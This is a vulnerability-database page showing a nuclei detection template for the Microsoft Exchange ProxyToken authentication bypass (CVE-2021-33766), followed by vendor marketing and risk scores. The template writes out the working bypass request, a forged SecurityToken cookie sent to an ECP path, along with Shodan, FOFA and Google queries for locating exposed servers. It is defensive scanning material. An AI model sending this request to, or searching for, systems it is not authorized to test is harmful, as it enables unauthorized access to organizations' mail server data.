Lucene search
K

Microsoft Exchange - Authentication Bypass

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Microsoft Exchange Server authentication bypass could grant access to internal server data.

Related
Refs
Code
id: CVE-2021-33766

info:
  name: Microsoft Exchange - Authentication Bypass
  author: daffainfo
  severity: high
  description: |
    Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
  impact: |
    Unauthenticated attackers can bypass authentication using a SecurityToken cookie, gaining access to Exchange Server's internal API endpoints and sensitive information.
  remediation: |
    Apply security updates provided by Microsoft to fix the authentication bypass vulnerability.
  reference:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
    - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
    - https://github.com/demossl/CVE-2021-33766-ProxyToken
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-33766
    epss-score: 0.97502
    epss-percentile: 0.99893
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
        Host: {{Hostname}}
        Cookie: SecurityToken=x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<span id="msgCode">403</span>'
          - 'function signOut() {'
        condition: and

      - type: word
        part: header
        words:
          - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
          - "X-BEResource="
        condition: and

      - type: status
        status:
          - 403
# digest: 4a0a00473045022100e4c4df0a83322093a883c74d631ba8c5f54913977e7816c4fc332cf6fb8d5cb4022055a8d697262f4697b40422c09a4f5a81cc3e3cfcab0af2dc23d3587391414c98:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 27.5
CVSS 3.19.1 - 9.8
EPSS0.99999
SSVC
20